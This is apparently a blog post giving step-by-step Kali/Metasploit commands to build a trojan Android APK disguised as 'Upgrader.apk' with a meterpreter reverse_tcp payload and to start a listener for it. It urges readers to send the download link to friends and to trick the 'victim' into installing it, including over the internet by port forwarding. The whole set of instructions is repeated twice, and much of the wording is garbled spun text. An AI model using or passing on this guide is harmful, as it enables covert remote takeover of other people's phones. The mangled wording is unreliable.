Hack Android using Kali
Android is a mobile operating system (OS) based on the Linux kernel and currently developed by Google. With a user interface based on direct manipulation, Android is designed primarily for touchscreen mobile devices such as smartphones and tablet computers, with specialized user interfaces for televisions (Android TV), cars (Android Auto), and wrist watches (Android Wear). The OS uses touch inputs that loosely correspond to real-world actions, like swiping, tapping, pinching, and reverse pinching to manipulate on-screen objects, and a virtual keyboard. Despite being primarily designed for touchscreen input, it has also been used in game consoles, digital cameras, regular PCs, and other electronics. As of 2015, Android has the largest installed base of all operating systems.
Step 1: Open up Kali:
--->Open a terminal, and make a Trojan .apk
--->You can do this by writing
--->msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R >/root/Upgrader.apk (supplant LHOST with your own IP)
--->You can likewise hack android on WAN i.e. through Interet by utilizing your Public/External IP in the LHOST and by port sending.
Step 2: Open Another Terminal:
---> Open another terminal until the file is being produced.
---->Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
---->After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
--->Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
---->To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
----> At last type: exploit to start the listener.
---->Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
Let the Victim introduce the Upgrader app(as he would think it is intended to update a few elements on his telephone) Then again, the choice of recompense for Installation of applications from Unknown Sources ought to be empowered (if not) from the security settings of the android telephone to permit the Trojan to introduce.
Also, when he snaps Open...
Step 5: BLAST!
There comes the meterpreter brief:
Step 1: Open up Kali:
--->Open a terminal, and make a Trojan .apk
--->You can do this by writing
--->msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R >/root/Upgrader.apk (supplant LHOST with your own IP)
--->You can likewise hack android on WAN i.e. through Interet by utilizing your Public/External IP in the LHOST and by port sending.
Step 2: Open Another Terminal:
---> Open another terminal until the file is being produced.
---->Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
---->After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
--->Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
---->To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
----> At last type: exploit to start the listener.
---->Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
Let the Victim introduce the Upgrader app(as he would think it is intended to update a few elements on his telephone) Then again, the choice of recompense for Installation of applications from Unknown Sources ought to be empowered (if not) from the security settings of the android telephone to permit the Trojan to introduce.
Also, when he snaps Open...
Step 5: BLAST!
There comes the meterpreter brief:
dude how can i set up my network settings in kali as it is not connected to internet even if the RJ wire is connected and blinking as in working netwok connection
ReplyDeleteuse vm ware
ReplyDelete